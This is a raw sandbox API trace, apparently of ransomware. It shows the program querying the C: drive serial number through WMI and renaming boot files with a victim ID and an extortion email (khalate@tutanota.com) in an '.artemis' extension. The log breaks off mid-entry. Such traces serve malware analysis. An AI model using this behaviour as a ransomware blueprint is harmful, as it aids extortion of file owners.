WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0193.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e464 | out: ppvObject=0x689e464*=0x0) returned 0x80004002 [0193.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e470 | out: ppvObject=0x689e470*=0x9820e88) returned 0x0 [0193.389] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820e88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e478 | out: pCid=0x689e478*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.389] WbemDefPath:IUnknown:Release (This=0x9820e88) returned 0x3 [0193.389] CoGetContextToken (in: pToken=0x689e4d0 | out: pToken=0x689e4d0) returned 0x0 [0193.389] CoGetContextToken (in: pToken=0x689e8d8 | out: pToken=0x689e8d8) returned 0x0 [0193.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e968 | out: ppvObject=0x689e968*=0x0) returned 0x80004002 [0193.389] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0193.389] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0193.389] CoGetContextToken (in: pToken=0x689f260 | out: pToken=0x689f260) returned 0x0 [0193.389] CoGetContextToken (in: pToken=0x689f1c0 | out: pToken=0x689f1c0) returned 0x0 [0193.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x689f290*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f28c | out: ppvObject=0x689f28c*=0x6738850) returned 0x0 [0193.389] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0193.389] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0193.389] WbemDefPath:IWbemPath:SetText (This=0x6738850, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0193.390] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x689f410 | out: puCount=0x689f410*=0x2) returned 0x0 [0193.390] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x689f40c*=0x0, pszText=0x0 | out: puBuffLength=0x689f40c*=0xf, pszText=0x0) returned 0x0 [0193.390] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x689f40c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f40c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.390] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f410 | out: ppv=0x689f410*=0x72015c) returned 0x0 [0193.390] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f408 | out: pAptType=0x689f408*=1) returned 0x0 [0193.390] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f40c | out: ppvObject=0x689f40c*=0x0) returned 0x80004002 [0193.390] IUnknown:Release (This=0x72015c) returned 0x1 [0193.391] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f030 | out: ppv=0x689f030*=0x672f3d0) returned 0x0 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x672f3d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f248 | out: ppvObject=0x689f248*=0x0) returned 0x80004002 [0193.391] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f3d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f25c | out: ppvObject=0x689f25c*=0x6737068) returned 0x0 [0193.391] WbemLocator:IUnknown:Release (This=0x672f3d0) returned 0x0 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee7c | out: ppvObject=0x689ee7c*=0x6737068) returned 0x0 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee38 | out: ppvObject=0x689ee38*=0x0) returned 0x80004002 [0193.391] WbemLocator:IUnknown:AddRef (This=0x6737068) returned 0x3 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e744 | out: ppvObject=0x689e744*=0x0) returned 0x80004002 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e750 | out: ppvObject=0x689e750*=0x0) returned 0x80004002 [0193.391] CoGetContextToken (in: pToken=0x689e7b0 | out: pToken=0x689e7b0) returned 0x0 [0193.391] CoGetContextToken (in: pToken=0x689ebb8 | out: pToken=0x689ebb8) returned 0x0 [0193.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec48 | out: ppvObject=0x689ec48*=0x0) returned 0x80004002 [0193.392] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x2 [0193.392] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x1 [0193.392] CoGetContextToken (in: pToken=0x689f228 | out: pToken=0x689f228) returned 0x0 [0193.392] CoGetContextToken (in: pToken=0x689f188 | out: pToken=0x689f188) returned 0x0 [0193.392] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x689f258*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f254 | out: ppvObject=0x689f254*=0x6737068) returned 0x0 [0193.392] WbemLocator:IUnknown:AddRef (This=0x6737068) returned 0x3 [0193.392] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x2 [0193.392] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x689f3ec | out: puCount=0x689f3ec*=0x2) returned 0x0 [0193.392] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=8, puBuffLength=0x689f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x689f3e8*=0xf, pszText=0x0) returned 0x0 [0193.392] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=8, puBuffLength=0x689f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.392] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f2c4 | out: ppv=0x689f2c4*=0x6736e18) returned 0x0 [0193.392] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e18, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f358 | out: ppNamespace=0x689f358*=0x6748314) returned 0x0 [0194.606] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1f4 | out: ppvObject=0x689f1f4*=0x781cc4) returned 0x0 [0194.606] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781cc4, pProxy=0x6748314, pAuthnSvc=0x689f244, pAuthzSvc=0x689f240, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c, pImpLevel=0x689f22c, pAuthInfo=0x689f230, pCapabilites=0x689f234 | out: pAuthnSvc=0x689f244*=0xa, pAuthzSvc=0x689f240*=0x0, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c*=0x6, pImpLevel=0x689f22c*=0x2, pAuthInfo=0x689f230, pCapabilites=0x689f234*=0x1) returned 0x0 [0194.606] WbemLocator:IUnknown:Release (This=0x781cc4) returned 0x1 [0194.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e8 | out: ppvObject=0x689f1e8*=0x781ce4) returned 0x0 [0194.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e4 | out: ppvObject=0x689f1e4*=0x781cc4) returned 0x0 [0194.607] WbemLocator:IClientSecurity:SetBlanket (This=0x781cc4, pProxy=0x6748314, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0194.812] WbemLocator:IUnknown:Release (This=0x781cc4) returned 0x2 [0194.812] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x1 [0194.812] CoTaskMemFree (pv=0x77e118) [0194.812] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x0 [0194.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ede4 | out: ppvObject=0x689ede4*=0x781ce4) returned 0x0 [0194.813] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eda0 | out: ppvObject=0x689eda0*=0x0) returned 0x80004002 [0195.409] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ebbc | out: ppvObject=0x689ebbc*=0x0) returned 0x80004002 [0195.410] WbemLocator:IUnknown:AddRef (This=0x781ce4) returned 0x3 [0195.410] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0195.410] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6ac | out: ppvObject=0x689e6ac*=0x0) returned 0x80004002 [0195.410] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e6b8 | out: ppvObject=0x689e6b8*=0x781c44) returned 0x0 [0195.411] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781c44, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e6c0 | out: pCid=0x689e6c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.411] WbemLocator:IUnknown:Release (This=0x781c44) returned 0x3 [0195.411] CoGetContextToken (in: pToken=0x689e718 | out: pToken=0x689e718) returned 0x0 [0195.411] CoGetContextToken (in: pToken=0x689eb20 | out: pToken=0x689eb20) returned 0x0 [0195.411] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebb0 | out: ppvObject=0x689ebb0*=0x781ccc) returned 0x0 [0195.411] WbemLocator:IRpcOptions:Query (in: This=0x781ccc, pPrx=0x781ce4, dwProperty=2, pdwValue=0x689ebd8 | out: pdwValue=0x689ebd8) returned 0x80004002 [0195.411] WbemLocator:IUnknown:Release (This=0x781ccc) returned 0x3 [0195.411] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x2 [0195.411] CoGetContextToken (in: pToken=0x689f0f8 | out: pToken=0x689f0f8) returned 0x0 [0195.411] CoGetContextToken (in: pToken=0x689f058 | out: pToken=0x689f058) returned 0x0 [0195.411] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x689f128*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f124 | out: ppvObject=0x689f124*=0x6748314) returned 0x0 [0195.411] WbemLocator:IUnknown:AddRef (This=0x6748314) returned 0x4 [0195.411] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x3 [0195.411] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x2 [0195.411] SysStringLen (param_1=0x0) returned 0x0 [0195.412] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x689f4bc | out: puCount=0x689f4bc*=0x0) returned 0x0 [0195.412] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x689f4b8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4b8*=0x20, pszText=0x0) returned 0x0 [0195.412] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x689f4b8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4b8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.412] CoGetContextToken (in: pToken=0x689f128 | out: pToken=0x689f128) returned 0x0 [0195.412] WbemLocator:IUnknown:AddRef (This=0x781ce4) returned 0x3 [0195.412] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efbc | out: ppvObject=0x689efbc*=0x781ce4) returned 0x0 [0195.412] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x3 [0195.412] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x2 [0195.412] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0x20, pszText=0x0) returned 0x0 [0195.412] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x689f4c0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.412] IWbemServices:GetObject (in: This=0x6748314, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f474*=0x0, ppCallResult=0x0 | out: ppObject=0x689f474*=0x673bf90, ppCallResult=0x0) returned 0x0 [0196.370] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x689f474 | out: puCount=0x689f474*=0x2) returned 0x0 [0196.370] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x689f470*=0x0, pszText=0x0 | out: puBuffLength=0x689f470*=0xf, pszText=0x0) returned 0x0 [0196.370] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x689f470*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f470*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.370] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f470*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34b0640*=0, plFlavor=0x34b0644*=0 | out: pVal=0x689f470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34b0640*=8, plFlavor=0x34b0644*=0) returned 0x0 [0196.370] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.370] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.370] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34b0640*=8, plFlavor=0x34b0644*=0 | out: pVal=0x689f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34b0640*=8, plFlavor=0x34b0644*=0) returned 0x0 [0196.370] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.370] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.370] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0196.370] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x48 [0196.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4d8) returned 1 [0196.371] GetFileAttributesExW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x689f554 | out: lpFileInformation=0x689f554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50)) returned 1 [0196.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4d4) returned 1 [0196.371] MoveFileW (lpExistingFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0196.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0196.372] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0196.372] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0196.373] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b570 [0196.373] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.373] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0196.373] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0196.373] FindClose (in: hFindFile=0x77b570 | out: hFindFile=0x77b570) returned 1 [0196.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0196.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0196.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0196.374] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0196.374] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0196.374] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b570 [0196.374] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.374] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, 